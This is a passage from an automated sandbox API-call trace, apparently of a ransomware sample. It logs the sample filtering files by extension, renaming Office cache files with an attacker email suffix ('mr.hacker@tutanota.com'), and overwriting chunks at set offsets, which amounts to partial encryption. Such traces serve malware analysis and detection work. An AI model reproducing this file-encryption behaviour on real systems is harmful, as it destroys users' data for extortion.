lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString=".1cd") returned 4 [0048.398] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString=".jpg") returned 4 [0048.398] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString=".doc") returned 4 [0048.398] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".docx") returned 5 [0048.398] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0048.398] lstrlenW (lpString=".pdf") returned 4 [0048.398] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".xls") returned 4 [0048.398] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".xlsx") returned 5 [0048.398] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0048.398] lstrlenW (lpString=".ppt") returned 4 [0048.398] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString=".zip") returned 4 [0048.398] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".rar") returned 4 [0048.398] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".bz2") returned 4 [0048.398] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.399] lstrlenW (lpString=".7z") returned 3 [0048.399] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.399] lstrlenW (lpString=".dbf") returned 4 [0048.399] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.399] lstrlenW (lpString=".1cd") returned 4 [0048.399] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.399] lstrlenW (lpString=".jpg") returned 4 [0048.399] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.399] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0048.399] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0048.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0048.399] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=36233052) returned 1 [0048.399] CloseHandle (hObject=0x178) returned 1 [0048.399] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0048.399] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.399] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0048.400] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0048.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0048.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.400] ReadFile (in: hFile=0x178, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.405] ReadFile (in: hFile=0x178, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.409] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.409] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.409] ReadFile (in: hFile=0x178, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.793] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.793] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.807] SetEndOfFile (hFile=0x178) returned 1 [0048.808] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40270d8 [0048.808] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.808] WriteFile (in: hFile=0x178, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.808] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.808] WriteFile (in: hFile=0x178, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.809] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.809] WriteFile (in: hFile=0x178, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.811] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270d8 | out: hHeap=0x5d0000) returned 1 [0048.811] CloseHandle (hObject=0x178) returned 1 [0048.811] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString=".doc") returned 4 [0048.818] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString=".docx") returned 5 [0048.818] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.818] lstrlenW (lpString=".pdf") returned 4 [0048.818] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString=".xls") returned 4 [0048.818] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString=".xlsx") returned 5 [0048.818] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.818] lstrlenW (lpString=".ppt") returned 4 [0048.818] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString=".zip") returned 4 [0048.818] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString=".rar") returned 4 [0048.818] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString=".bz2") returned 4 [0048.818] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.818] lstrlenW (lpString=".7z") returned 3 [0048.818] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString=".dbf") returned 4 [0048.818] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString=".1cd") returned 4 [0048.818] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.818] lstrlenW (lpString=".jpg") returned 4 [0048.818] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString=".doc") returned 4 [0048.819] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString=".docx") returned 5 [0048.819] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.819] lstrlenW (lpString=".pdf") returned 4 [0048.819] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString=".xls") returned 4 [0048.819] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString=".xlsx") returned 5 [0048.819] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.819] lstrlenW (lpString=".ppt") returned 4 [0048.819] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString=".zip") returned 4 [0048.819] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString=".rar") returned 4 [0048.819] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString=".bz2") returned 4 [0048.819] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.819] lstrlenW (lpString=".7z") returned 3 [0048.819] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString=".dbf") returned 4 [0048.819] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString=".1cd") returned 4 [0048.819] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.819] lstrlenW (lpString=".jpg") returned 4 [0048.819] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.819] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0048.820] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0048.820] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0048.820] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=27532288) returned 1 [0048.820] CloseHandle (hObject=0x178) returned 1 [0048.820] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0048.820] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.820] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0048.820] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0048.821] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0048.821] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.821] ReadFile (in: hFile=0x178, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.826] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.828] ReadFile (in: hFile=0x178, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.832] ReadFile (in: hFile=0x178, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.040] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.040] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0049.059] SetEndOfFile (hFile=0x178) returned 1 [0049.412] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0049.416] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.416] WriteFile (in: hFile=0x178, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.416] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.416] WriteFile (in: hFile=0x178, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.420] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.420] WriteFile (in: hFile=0x178, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0049.941] CloseHandle (hObject=0x178) returned 1 [0050.043] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.231] lstrlenW (lpString=".doc") returned 4 [0050.231] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.231] lstrlenW (lpString=".docx") returned 5 [0050.231] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.231] lstrlenW (lpString=".pdf") returned 4 [0050.231] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.231] lstrlenW (lpString=".xls") returned 4 [0050.231] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.231] lstrlenW (lpString=".xlsx") returned 5 [0050.232] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.232] lstrlenW (lpString=".ppt") returned 4 [0050.232] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString=".zip") returned 4 [0050.232] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.232] lstrlenW (lpString=".rar") returned 4 [0050.232] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.232] lstrlenW (lpString=".bz2") returned 4 [0050.232] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.232] lstrlenW (lpString=".7z") returned 3 [0050.232] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString=".dbf") returned 4 [0050.232] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString=".1cd") returned 4 [0050.232] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString=".jpg") returned 4 [0050.232] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.232] lstrlenW (lpString=".doc") returned 4 [0050.232] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.232] lstrlenW (lpString=".docx") returned 5 [0050.232] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.232] lstrlenW (lpString=".pdf") returned 4 [0050.232] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.232] lstrlenW (lpString=".xls") returned 4 [0050.232] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.232] lstrlenW (lpString=".xlsx") returned 5 [0050.232] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.232] lstrlenW (lpString=".ppt") returned 4 [0050.232] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.233] lstrlenW (lpString=".zip") returned 4 [0050.233] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.233] lstrlenW (lpString=".rar") returned 4 [0050.233] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.233] lstrlenW (lpString=".bz2") returned 4 [0050.233] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.233] lstrlenW (lpString=".7z") returned 3 [0050.233] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.233] lstrlenW (lpString=".dbf") returned 4 [0050.233] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.233] lstrlenW (lpString=".1cd") returned 4 [0050.233] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0050.233] lstrlenW (lpString=".jpg") returned 4 [0050.233] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.233] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0050.233] lstrlenW (lpString="Office32WW.msi") returned 14 [0050.233] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.234] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1992192) returned 1 [0050.234] CloseHandle (hObject=0x218) returned 1 [0050.234] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0050.234] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.234] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0050.234] CreateFileW (lpFileName="C:\\MSOCache\\All 